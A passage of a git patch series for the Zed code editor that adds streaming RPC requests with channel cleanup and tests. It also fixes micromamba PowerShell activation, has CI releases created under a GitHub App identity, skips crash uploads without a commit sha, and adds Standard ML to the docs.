log::error!("failed to send message: {error}"); + anyhow::bail!("failed to send message: {error}"); + } + + let cleanup_stream_response_channel = util::defer({ + let stream_response_channels = stream_response_channels.clone(); + move || { + stream_response_channels.lock().remove(&message_id); + } + }); + + Ok(rx + .filter_map(move |(response, _barrier)| { + // Keep the cleanup guard alive until the returned stream is dropped. 
+ let _keep_cleanup_guard_alive = &cleanup_stream_response_channel; + futures::future::ready(match response { + Ok(response) => { + if let Some(proto::envelope::Payload::Error(error)) = &response.payload + { + Some(Err(RpcError::from_proto(error, type_name))) + } else if let Some(proto::envelope::Payload::EndStream(_)) = + &response.payload + { + None + } else { + Some(Ok(response)) + } + } + Err(error) => Some(Err(error)), + }) + }) + .boxed()) + } + } + pub fn send_dynamic(&self, mut envelope: proto::Envelope) -> Result<()> { envelope.id = self.next_message_id.fetch_add(1, SeqCst); self.send_buffered(envelope) @@ -1751,6 +1965,14 @@ impl ProtoClient for ChannelClient { self.request_dynamic(envelope, request_type, true).boxed() } + fn request_stream( + &self, + envelope: proto::Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { + self.request_stream_dynamic(envelope, request_type).boxed() + } + fn send(&self, envelope: proto::Envelope, _message_type: &'static str) -> Result<()> { self.send_dynamic(envelope) } diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 825c0ba26c0474..d31403275cbb14 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -11,7 +11,10 @@ use languages::rust_lang; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs}; -use git::repository::Worktree as GitWorktree; +use git::{ + Oid, + repository::{CommitData, Worktree as GitWorktree}, +}; use gpui::{AppContext as _, Entity, SharedString, TestAppContext}; use http_client::{BlockedHttpClient, FakeHttpClient}; use language::{ @@ -29,11 +32,13 @@ use project::{ search::{SearchQuery, SearchResult}, }; use remote::RemoteClient; +use rpc::proto; use serde_json::json; use settings::{Settings, SettingsLocation, SettingsStore, initial_server_settings_content}; use smol::stream::StreamExt; use std::{ path::{Path, PathBuf}, + str::FromStr, 
sync::Arc, }; use unindent::Unindent as _; @@ -1626,6 +1631,108 @@ async fn test_remote_root_repo_common_dir(cx: &mut TestAppContext, server_cx: &m assert_eq!(common_dir, None); } +#[gpui::test] +async fn test_remote_search_commits_streams_proto_chunks( + cx: &mut TestAppContext, + server_cx: &mut TestAppContext, +) { + const COMMIT_COUNT: usize = 900; + const RESPONSE_MAX_SIZE: usize = 100; + + let fs = FakeFs::new(server_cx.executor()); + fs.insert_tree( + path!("/code"), + json!({ + "project1": { + ".git": {}, + "file.txt": "content", + }, + }), + ) + .await; + + let commit_data = (0..COMMIT_COUNT) + .map(|index| { + let sha = Oid::from_str(&format!("{:040x}", index + 1)).unwrap(); + ( + CommitData { + sha, + parents: Default::default(), + author_name: SharedString::from("Author"), + author_email: SharedString::from("author@example.com"), + commit_timestamp: index as i64, + subject: SharedString::from(format!("Subject {index}")), + message: SharedString::from(format!("needle commit {index}")), + }, + false, + ) + }) + .collect::>(); + let expected_shas = commit_data + .iter() + .map(|(commit_data, _)| commit_data.sha.to_string()) + .collect::>(); + fs.set_commit_data(Path::new(path!("/code/project1/.git")), commit_data); + + let (project, _headless) = init_test(&fs, cx, server_cx).await; + project + .update(cx, |project, cx| { + project.find_or_create_worktree(path!("/code/project1"), true, cx) + }) + .await + .expect("should open remote worktree"); + server_cx.run_until_parked(); + cx.run_until_parked(); + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let (remote_client, repository_id) = project.read_with(cx, |project, cx| { + let repository = project + .active_repository(cx) + .expect("remote project should have an active repository"); + let repository_id = repository.read(cx).snapshot().id; + let remote_client = project + .remote_client() + .expect("project should have a remote client"); + (remote_client, repository_id) + 
}); + let proto_client = remote_client.read_with(cx, |remote_client, _| remote_client.proto_client()); + let mut stream = proto_client + .request_stream(proto::SearchCommits { + project_id: proto::REMOTE_SERVER_PROJECT_ID, + repository_id: repository_id.to_proto(), + log_source: Some(proto::GitLogSource { + source: Some(proto::git_log_source::Source::All( + proto::GitLogSourceAll {}, + )), + }), + query: "needle".to_string(), + case_sensitive: true, + }) + .await + .expect("search commits stream should start"); + + let mut chunks = Vec::new(); + while let Some(response) = futures::StreamExt::next(&mut stream).await { + chunks.push(response.expect("search commits chunk should succeed").shas); + } + + assert!( + chunks.len() > 1, + "expected search results to stream in multiple chunks" + ); + for chunk in chunks.iter().take(chunks.len() - 1) { + assert!( + chunk.len() <= RESPONSE_MAX_SIZE, + "non-final chunks should meet the target byte size" + ); + } + + let actual_shas = chunks.into_iter().flatten().collect::>(); + assert_eq!(actual_shas, expected_shas); +} + #[gpui::test] async fn test_remote_archive_git_operations_are_supported( cx: &mut TestAppContext, diff --git a/crates/rpc/src/peer.rs b/crates/rpc/src/peer.rs index 73be0f19fe20ba..d9f34d0dc59ea5 100644 --- a/crates/rpc/src/peer.rs +++ b/crates/rpc/src/peer.rs @@ -8,7 +8,7 @@ use super::{ use anyhow::{Context as _, Result, anyhow}; use collections::HashMap; use futures::{ - FutureExt, SinkExt, Stream, StreamExt, TryFutureExt, + FutureExt, SinkExt, StreamExt, TryFutureExt, channel::{mpsc, oneshot}, stream::BoxStream, }; @@ -278,11 +278,23 @@ impl Peer { ); let response_channel = response_channels.lock().as_mut()?.remove(&responding_to); - let stream_response_channel = stream_response_channels - .lock() - .as_ref()? 
- .get(&responding_to) - .cloned(); + let terminal_stream_response = matches!( + &incoming.payload, + Some(proto::envelope::Payload::Error(_)) + | Some(proto::envelope::Payload::EndStream(_)) + ); + let stream_response_channel = if terminal_stream_response { + stream_response_channels + .lock() + .as_mut()? + .remove(&responding_to) + } else { + stream_response_channels + .lock() + .as_ref()? + .get(&responding_to) + .cloned() + }; if let Some(tx) = response_channel { let requester_resumed = oneshot::channel(); @@ -319,21 +331,15 @@ impl Peer { ?error, "incoming stream response: request future dropped", ); + // The consumer has gone away, so drop the bookkeeping + // for this stream rather than letting it accumulate + // every subsequent message until a terminal frame. + if let Some(channels) = stream_response_channels.lock().as_mut() { + channels.remove(&responding_to); + } + } else { + let _ = requester_resumed.1.await; } - - tracing::debug!( - %connection_id, - message_id, - responding_to, - "incoming stream response: waiting to resume requester" - ); - let _ = requester_resumed.1.await; - tracing::debug!( - %connection_id, - message_id, - responding_to, - "incoming stream response: requester resumed" - ); } else { let message_type = proto::build_typed_envelope( connection_id.into(), @@ -484,55 +490,96 @@ impl Peer { &self, receiver_id: ConnectionId, request: T, - ) -> impl Future>>> { + ) -> impl Future>>> { + let stream = + self.request_stream_dynamic(receiver_id, request.into_envelope(0, None, None), T::NAME); + + async move { + Ok(stream + .await? + .map(|response| { + T::Response::from_envelope(response?) 
+ .context("received response of the wrong type") + }) + .boxed()) + } + } + + pub fn request_stream_dynamic( + &self, + receiver_id: ConnectionId, + mut envelope: proto::Envelope, + request_type: &'static str, + ) -> impl Future>>> + use<> { let (tx, rx) = mpsc::unbounded(); let send = self.connection_state(receiver_id).and_then(|connection| { let message_id = connection.next_message_id.fetch_add(1, SeqCst); + envelope.id = message_id; let stream_response_channels = connection.stream_response_channels.clone(); stream_response_channels .lock() .as_mut() .context("connection was closed")? .insert(message_id, tx); - connection + if let Err(error) = connection .outgoing_tx - .unbounded_send(Message::Envelope( - request.into_envelope(message_id, None, None), - )) - .context("connection was closed")?; + .unbounded_send(Message::Envelope(envelope)) + { + if let Some(channels) = stream_response_channels.lock().as_mut() { + channels.remove(&message_id); + } + return Err(error).context("connection was closed"); + } Ok((message_id, stream_response_channels)) }); async move { let (message_id, stream_response_channels) = send?; let stream_response_channels = Arc::downgrade(&stream_response_channels); - - Ok(rx.filter_map(move |(response, _barrier)| { + let cleanup_stream_response_channel = util::defer({ let stream_response_channels = stream_response_channels.clone(); - future::ready(match response { - Ok(response) => { - if let Some(proto::envelope::Payload::Error(error)) = &response.payload { - Some(Err(RpcError::from_proto(error, T::NAME))) - } else if let Some(proto::envelope::Payload::EndStream(_)) = - &response.payload - { - // Remove the transmitting end of the response channel to end the stream. 
- if let Some(channels) = stream_response_channels.upgrade() - && let Some(channels) = channels.lock().as_mut() + move || { + if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + } + }); + + Ok(rx + .filter_map(move |(response, _barrier)| { + let _keep_cleanup_guard_alive = &cleanup_stream_response_channel; + let stream_response_channels = stream_response_channels.clone(); + future::ready(match response { + Ok(response) => { + if let Some(proto::envelope::Payload::Error(error)) = &response.payload { - channels.remove(&message_id); + // Remove the transmitting end of the response channel to end the stream. + if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + Some(Err(RpcError::from_proto(error, request_type))) + } else if let Some(proto::envelope::Payload::EndStream(_)) = + &response.payload + { + // Remove the transmitting end of the response channel to end the stream. 
+ if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + None + } else { + Some(Ok(response)) } - None - } else { - Some( - T::Response::from_envelope(response) - .context("received response of the wrong type"), - ) } - } - Err(error) => Some(Err(error)), + Err(error) => Some(Err(error)), + }) }) - })) + .boxed()) } } @@ -661,6 +708,13 @@ impl Peer { .with_context(|| format!("no such connection: {connection_id}"))?; Ok(connection.clone()) } + + #[cfg(any(test, feature = "test-support"))] + pub fn pending_stream_request_count(&self, connection_id: ConnectionId) -> Option { + let connection = self.connection_state(connection_id).ok()?; + let channels = connection.stream_response_channels.lock(); + Some(channels.as_ref()?.len()) + } } impl Serialize for Peer { @@ -992,6 +1046,268 @@ mod tests { ); } + #[gpui::test(iterations = 50)] + async fn test_request_stream(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + executor + .spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + server.respond(receipt, proto::Test { id: 2 }).unwrap(); + server.respond(receipt, 
proto::Test { id: 3 }).unwrap(); + server.end_stream(receipt).unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }) + .detach(); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + let mut received = Vec::new(); + while let Some(item) = stream.next().await { + received.push(item.unwrap()); + } + + assert_eq!( + received, + vec![ + proto::Test { id: 1 }, + proto::Test { id: 2 }, + proto::Test { id: 3 }, + ] + ); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0) + ); + } + + #[gpui::test] + async fn test_request_stream_send_failure_cleans_up_response_channel(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let client = Peer::new(0); + + let (client_to_server_conn, _server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task, _client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + + drop(io_task); + + let result = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await; + + assert!( + result.is_err(), + "stream request should fail when the connection write task has gone away" + ); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0), + "failed stream request should not leave response channel bookkeeping behind" + ); + } + + #[gpui::test(iterations = 50)] + async fn test_request_stream_terminates_on_error(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + 
server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + executor + .spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + // Send an Error without a trailing EndStream. The Error alone + // should be treated as a terminal stream response. + server + .respond_with_error( + receipt, + ErrorCode::Internal.message("boom".to_string()).to_proto(), + ) + .unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }) + .detach(); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + assert_eq!(stream.next().await.unwrap().unwrap(), proto::Test { id: 1 }); + + let error = stream.next().await.unwrap().unwrap_err(); + assert!( + format!("{error}").contains("boom"), + "expected error to surface server message, got: {error}" + ); + + // The error alone (without an EndStream) should terminate the stream. 
+ assert!(stream.next().await.is_none()); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0) + ); + } + + #[gpui::test(iterations = 50)] + async fn test_dropping_stream_request_before_completion(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + let (drop_signal_tx, drop_signal_rx) = oneshot::channel::<()>(); + let server_task = executor.spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + + // Wait until the consumer has dropped the stream. + drop_signal_rx.await.ok(); + + // Send a non-terminal response after the consumer is gone. The + // peer should detect that the receiver has been dropped and clean + // up its bookkeeping. Crucially, we do NOT send EndStream here + // because that would clean up via the terminal-response path and + // mask the bug. + server.respond(receipt, proto::Test { id: 2 }).unwrap(); + + // A Ping/Ack round-trip after the response acts as a sync + // barrier: because messages over the in-memory connection are + // delivered in order, by the time the client observes the Ack, + // it has already processed the dropped response above. 
+ let ping = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + server.respond(ping.receipt(), proto::Ack {}).unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + assert_eq!(stream.next().await.unwrap().unwrap(), proto::Test { id: 1 }); + + // The stream is mid-flight, so the channel should be tracked. + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(1) + ); + + drop(stream); + drop_signal_tx.send(()).ok(); + + // Synchronization barrier: once this Ack arrives, the read loop has + // already processed the orphaned stream response that came before it. + client + .request(client_to_server_conn_id, proto::Ping {}) + .await + .unwrap(); + + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0), + "stream channel should be removed once the consumer has dropped the stream" + ); + + drop(server_task); + } + #[gpui::test(iterations = 50)] async fn test_disconnect(cx: &mut TestAppContext) { let executor = cx.executor(); diff --git a/crates/rpc/src/proto_client.rs b/crates/rpc/src/proto_client.rs index ba8b8782725936..cb45948d5cd9b1 100644 --- a/crates/rpc/src/proto_client.rs +++ b/crates/rpc/src/proto_client.rs @@ -1,9 +1,10 @@ use anyhow::{Context, Result}; use collections::HashMap; use futures::{ - Future, FutureExt as _, + Future, FutureExt as _, Stream, StreamExt as _, channel::oneshot, future::{BoxFuture, LocalBoxFuture}, + stream::BoxStream, }; use gpui::{AnyEntity, AnyWeakEntity, AsyncApp, BackgroundExecutor, Entity, FutureExt as _}; use parking_lot::Mutex; @@ -61,6 +62,20 @@ pub trait ProtoClient: Send + Sync { request_type: &'static str, ) -> BoxFuture<'static, Result>; + fn request_stream( + &self, + envelope: Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { 
+ async move { + anyhow::bail!( + "stream requests are not supported for {request_type}: {:?}", + envelope.payload + ) + } + .boxed() + } + fn send(&self, envelope: Envelope, message_type: &'static str) -> Result<()>; fn send_response(&self, envelope: Envelope, message_type: &'static str) -> Result<()>; @@ -223,6 +238,23 @@ impl AnyProtoClient { } } + pub fn request_stream( + &self, + request: T, + ) -> impl Future>>> + use { + let envelope = request.into_envelope(0, None, None); + let response_stream = self.0.client.request_stream(envelope, T::NAME); + async move { + Ok(response_stream + .await? + .map(|response| { + T::Response::from_envelope(response?) + .context("received response of the wrong type") + }) + .boxed()) + } + } + pub fn send(&self, request: T) -> Result<()> { let envelope = request.into_envelope(0, None, None); self.0.client.send(envelope, T::NAME) @@ -479,6 +511,68 @@ impl AnyProtoClient { ); } + pub fn add_entity_stream_request_handler(&self, handler: H) + where + M: EnvelopedMessage + RequestMessage + EntityMessage, + E: 'static, + H: 'static + Sync + Send + Fn(gpui::Entity, TypedEnvelope, AsyncApp) -> F, + F: 'static + Future>, + S: 'static + Stream>, + { + let message_type_id = TypeId::of::(); + let entity_type_id = TypeId::of::(); + let entity_id_extractor = |envelope: &dyn AnyTypedEnvelope| { + (envelope as &dyn Any) + .downcast_ref::>() + .unwrap() + .payload + .remote_entity_id() + }; + self.0 + .client + .message_handler_set() + .lock() + .add_entity_message_handler( + message_type_id, + entity_type_id, + entity_id_extractor, + Arc::new(move |entity, envelope, client, cx| { + let entity = entity.downcast::().unwrap(); + let envelope = envelope.into_any().downcast::>().unwrap(); + let request_id = envelope.message_id(); + let stream = handler(entity, *envelope, cx); + async move { + // An Error response is itself a terminal stream frame on + // both transports (Peer and ChannelClient), so we don't + // need to follow it with an EndStream. 
+ match stream.await { + Ok(stream) => { + futures::pin_mut!(stream); + while let Some(result) = stream.next().await { + match result { + Ok(response) => { + client.send_response(request_id, response)? + } + Err(error) => { + client.send_response(request_id, error.to_proto())?; + return Err(error); + } + } + } + client.send_response(request_id, proto::EndStream {})?; + Ok(()) + } + Err(error) => { + client.send_response(request_id, error.to_proto())?; + Err(error) + } + } + } + .boxed_local() + }), + ); + } + pub fn add_entity_message_handler(&self, handler: H) where M: EnvelopedMessage + EntityMessage, From 098960eca0b386b3d05b004b6ccd040d4166d5c3 Mon Sep 17 00:00:00 2001 From: Adam Ehlers Nyholm Thomsen Date: Mon, 4 May 2026 18:44:18 +0200 Subject: [PATCH 170/231] Fix micromamba powershell activation (#55643) Powershell does not support eval, furthermore pwsh is also a "powershell" shell for micromamba. Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Fixes micromamba powershell activation --- crates/languages/src/python.rs | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 5cdff8654ff6b9..26e96789a0d4b6 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -1259,7 +1259,7 @@ fn micromamba_shell_name(kind: ShellKind) -> &'static str { ShellKind::Csh => "csh", ShellKind::Fish => "fish", ShellKind::Nushell => "nu", - ShellKind::PowerShell => "powershell", + ShellKind::PowerShell | ShellKind::Pwsh => "powershell", ShellKind::Cmd => "cmd.exe", // default / catch-all: _ => "posix", 
@@ -1470,9 +1470,17 @@ impl ToolchainLister for PythonToolchainProvider { // Activate micromamba shell in the child shell // [required for micromamba] if manager == "micromamba" { - let shell = micromamba_shell_name(shell); - activation_script - .push(format!(r#"eval "$({manager} shell hook --shell {shell})""#)); + match shell { + ShellKind::PowerShell | ShellKind::Pwsh => { + activation_script.push(format!(r#"(& {manager} shell hook --shell powershell) | Out-String | Invoke-Expression"#)); + } + _ => { + let shell_name = micromamba_shell_name(shell); + activation_script.push(format!( + r#"eval "$({manager} shell hook --shell {shell_name})""# + )); + } + } } if let Some(name) = &toolchain.environment.name { From c87a57f5a0cd6bfe3cbeea817fa8b1c2b944c833 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 4 May 2026 18:49:23 +0200 Subject: [PATCH 171/231] ci: Create releases with the Zed Zippy identity (#55649) Just a small QoL, the change here will make it so that under https://github.com/zed-industries/zed/releases/tag/v1.0.1 the releases will show as created by zed-zippy and not github-actions. 
Release Notes: - N/A --- .github/workflows/release.yml | 9 ++++++++- tooling/xtask/src/tasks/workflows/release.rs | 15 ++++++++++----- 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 05a28ec9c49685..a2a779dc14fe11 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -274,6 +274,13 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - id: generate-token + name: steps::authenticate_as_zippy + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 + with: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: @@ -289,7 +296,7 @@ jobs: - name: release::create_draft_release::create_release run: script/create-draft-release target/release-notes.md env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} timeout-minutes: 60 compliance_check: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index 717bf8786b675a..94db5508f80fe2 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ b/tooling/xtask/src/tasks/workflows/release.rs @@ -1,11 +1,11 @@ -use gh_workflow::{Event, Expression, Push, Run, Step, Use, Workflow, ctx::Context}; +use gh_workflow::{Event, Expression, Level, Push, Run, Step, Use, Workflow, ctx::Context}; use indoc::formatdoc; use crate::tasks::workflows::{ run_bundling::{bundle_linux, bundle_mac, bundle_windows, upload_artifact}, run_tests, runners::{self, Arch, Platform}, - steps::{self, FluentBuilder, NamedJob, dependant_job, named, release_job}, 
+ steps::{self, FluentBuilder, NamedJob, TokenPermissions, dependant_job, named, release_job}, vars::{self, JobOutput, StepOutput, assets}, }; @@ -471,11 +471,15 @@ fn create_draft_release() -> NamedJob { ) } - fn create_release() -> Step { + fn create_release(token: StepOutput) -> Step { named::bash("script/create-draft-release target/release-notes.md") - .add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)) + .add_env(("GITHUB_TOKEN", token.to_string())) } + let (authenticate_step, token) = steps::authenticate_as_zippy() + .with_permissions([(TokenPermissions::Contents, Level::Write)]) + .into(); + named::job( release_job(&[]) .runs_on(runners::LINUX_SMALL) @@ -483,6 +487,7 @@ fn create_draft_release() -> NamedJob { // is able to diff between the current and previous tag. // // 25 was chosen arbitrarily. + .add_step(authenticate_step) .add_step( steps::checkout_repo() .with_custom_fetch_depth(25) @@ -491,7 +496,7 @@ fn create_draft_release() -> NamedJob { .add_step(steps::script("script/determine-release-channel")) .add_step(steps::script("mkdir -p target/")) .add_step(generate_release_notes()) - .add_step(create_release()), + .add_step(create_release(token)), ) } From 271835c464032a195e41f1d207f14072ce96c402 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 20:44:05 +0200 Subject: [PATCH 172/231] zed: Do not upload crashes that lack an associated release (#55605) We will not have any debug data for these anyways (and usually this indicates someone else made a built that somehow points to our sentry endpoint ...) Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/zed/src/reliability.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index e6c3821507cffb..b74cdebbacd5e5 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -266,6 +266,10 @@ async fn upload_minidump( minidump: Vec, metadata: &crashes::CrashInfo, ) -> Result<()> { + if metadata.init.commit_sha == "no sha" { + log::warn!("No commit sha set, skipping minidump upload"); + return Ok(()); + } let mut form = Form::new() .part( "upload_file_minidump", From 05b54117c3738d11697ff1db73694a82314c57ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Mon, 4 May 2026 21:08:24 +0200 Subject: [PATCH 173/231] client: Pass x-zed-system-id header in get_authenticated_user() (#55688) We are going to drive current organization selection with server side state, so we need to know which installation we are on so the server can return the correct currently selected organization. Next step will be using the organization from the response and removing the locally persisted current organization id. Part of CLO-716 Release Notes: - N/A --- crates/client/src/user.rs | 14 ++++++++++---- crates/cloud_api_client/src/cloud_api_client.rs | 15 ++++++++++----- 2 files changed, 20 insertions(+), 9 deletions(-) diff --git a/crates/client/src/user.rs b/crates/client/src/user.rs index ff4450f2697a70..0f43690491387e 100644 --- a/crates/client/src/user.rs +++ b/crates/client/src/user.rs @@ -229,9 +229,11 @@ impl UserStore { | Status::Reauthenticated | Status::Connected { .. 
} => { if let Some(user_id) = client.user_id() { + let system_id = + client.telemetry().system_id().map(|id| id.to_string()); let response = client .cloud_client() - .get_authenticated_user() + .get_authenticated_user(system_id) .await .log_err(); @@ -912,15 +914,19 @@ impl UserStore { cx.spawn(async move |cx| { match message { MessageToClient::UserUpdated => { - let cloud_client = cx + let (cloud_client, system_id) = cx .update(|cx| { this.read_with(cx, |this, _cx| { - this.client.upgrade().map(|client| client.cloud_client()) + this.client.upgrade().map(|client| { + let system_id = + client.telemetry().system_id().map(|id| id.to_string()); + (client.cloud_client(), system_id) + }) }) })? .ok_or(anyhow::anyhow!("Failed to get Cloud client"))?; - let response = cloud_client.get_authenticated_user().await?; + let response = cloud_client.get_authenticated_user(system_id).await?; cx.update(|cx| { this.update(cx, |this, cx| { this.update_authenticated_user(response, cx); diff --git a/crates/cloud_api_client/src/cloud_api_client.rs b/crates/cloud_api_client/src/cloud_api_client.rs index 8c605bb3490ef5..43814e3b229fa0 100644 --- a/crates/cloud_api_client/src/cloud_api_client.rs +++ b/crates/cloud_api_client/src/cloud_api_client.rs @@ -74,15 +74,20 @@ impl CloudApiClient { pub async fn get_authenticated_user( &self, + system_id: Option, ) -> Result { - let request = self.build_request( - Request::builder().method(Method::GET).uri( + let request_builder = Request::builder() + .method(Method::GET) + .uri( self.http_client .build_zed_cloud_url("/client/users/me")? 
.as_ref(), - ), - AsyncBody::default(), - )?; + ) + .when_some(system_id, |builder, system_id| { + builder.header(ZED_SYSTEM_ID_HEADER_NAME, system_id) + }); + + let request = self.build_request(request_builder, AsyncBody::default())?; let mut response = self.http_client.send(request).await?; From 324f3c29349ac8131c23a111876ef290db84c1f3 Mon Sep 17 00:00:00 2001 From: Dzming Li Date: Tue, 5 May 2026 06:07:14 +0800 Subject: [PATCH 174/231] docs: Add Standard ML to community language extensions list (#55695) Adds the Standard ML community extension ([omarjatoi/zed-sml](https://github.com/omarjatoi/zed-sml)) to `docs/src/languages.md`. It is already published in the Zed extension registry ([zed.dev/extensions/sml](https://zed.dev/extensions/sml)) and provides Tree-sitter highlighting plus Millet LSP integration, but is currently missing from the language documentation page. Release Notes: - N/A --- docs/src/SUMMARY.md | 1 + docs/src/languages.md | 1 + docs/src/languages/sml.md | 28 ++++++++++++++++++++++++++++ 3 files changed, 30 insertions(+) create mode 100644 docs/src/languages/sml.md diff --git a/docs/src/SUMMARY.md b/docs/src/SUMMARY.md index 68542f285ac4ee..a3b8ce32ea52ba 100644 --- a/docs/src/SUMMARY.md +++ b/docs/src/SUMMARY.md @@ -139,6 +139,7 @@ - [Scheme](./languages/scheme.md) - [Shell Script](./languages/sh.md) - [SQL](./languages/sql.md) +- [Standard ML](./languages/sml.md) - [Svelte](./languages/svelte.md) - [Swift](./languages/swift.md) - [Tailwind CSS](./languages/tailwindcss.md) diff --git a/docs/src/languages.md b/docs/src/languages.md index f1145a704b143e..4b96e551cedab4 100644 --- a/docs/src/languages.md +++ b/docs/src/languages.md @@ -66,6 +66,7 @@ Some work out-of-the box and others rely on 3rd party extensions. 
